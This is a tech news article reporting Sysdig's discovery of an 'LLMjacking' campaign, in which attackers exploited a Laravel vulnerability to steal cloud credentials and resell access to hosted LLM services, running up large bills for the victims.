LLM services are being hit by hackers looking to sell on private info


Using cloud-hosted large language models (LLM) can be quite expensive, which is why hackers have apparently begun started stealing, and selling, login credentials to the tools.
Cybersecurity researchers Sysdig Threat Research Team recently spotted one such campaign, dubbing it LLMjacking.
In its report, Sysdig said it observed a threat actor abusing a vulnerability in the Laravel Framework, tracked as CVE-2021-3129. This flaw allowed them to access the network and scan it for Amazon Web Services (AWS) credentials for LLM services.
New methods of abuse
“Once initial access was obtained, they exfiltrated cloud credentials and gained access to the cloud environment, where they attempted to access local LLM models hosted by cloud providers,” the researchers explained in the report. “In this instance, a local Claude (v2/v3) LLM model from Anthropic was targeted.”
The researchers were able to discover the tools that the attackers used to generate the requests which invoked the models. Among them was a Python script that checked credentials for ten AI services, analyzing which one was useful. The services include AI21 Labs, Anthropic, AWS Bedrock, Azure, ElevenLabs, MakerSuite, Mistral, OpenAI, OpenRouter, and GCP Vertex AI.
They also discovered that the attackers didn’t run any legitimate LLM queries in the verification stage, but were rather doing “just enough” to find out what the credentials were capable of, and any quotas.
In its news report, The Hacker News says the findings are evidence that hackers are finding new ways to weaponize LLMs, besides the usual prompt injections and model poisoning, by monetizing access to LLMs, while the bill gets mailed to the victim.
Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features and guidance your business needs to succeed!
The bill, the researchers stressed, could be quite a big one, going up to $46,000 a day for LLM use.
“The use of LLM services can be expensive, depending on the model and the amount of tokens being fed to it,” the researchers added. “By maximizing the quota limits, attackers can also block the compromised organization from using models legitimately, disrupting business operations.”
More from TechRadar Pro
Using cloud-hosted large language models (LLM) can be quite expensive, which is why hackers have apparently begun started stealing, and selling, login credentials to the tools. Cybersecurity researchers Sysdig Threat Research Team recently spotted one such campaign, dubbing it LLMjacking. In its report, Sysdig said it observed a threat actor…
Recent Posts
- Google Gemini’s AI coding tool is now free for individual users
- Attention, Kindle owners –today is your last chance to download backups of your ebooks
- Scooby-Doo is a good movie with a bad Rotten Tomatoes score – here’s why you should ignore the critics and watch it before it leaves Netflix
- Microsoft is testing free Office for Windows apps with ads
- Everything new on Apple TV+ in March 2025: Severance season 2 finale, Dope Thief, The Studio, and more
Archives
- February 2025
- January 2025
- December 2024
- November 2024
- October 2024
- September 2024
- August 2024
- July 2024
- June 2024
- May 2024
- April 2024
- March 2024
- February 2024
- January 2024
- December 2023
- November 2023
- October 2023
- September 2023
- August 2023
- July 2023
- June 2023
- May 2023
- April 2023
- March 2023
- February 2023
- January 2023
- December 2022
- November 2022
- October 2022
- September 2022
- August 2022
- July 2022
- June 2022
- May 2022
- April 2022
- March 2022
- February 2022
- January 2022
- December 2021
- November 2021
- October 2021
- September 2021
- August 2021
- July 2021
- June 2021
- May 2021
- April 2021
- March 2021
- February 2021
- January 2021
- December 2020
- November 2020
- October 2020
- September 2020
- August 2020
- July 2020
- June 2020
- May 2020
- April 2020
- March 2020
- February 2020
- January 2020
- December 2019
- November 2019
- September 2018
- October 2017
- December 2011
- August 2010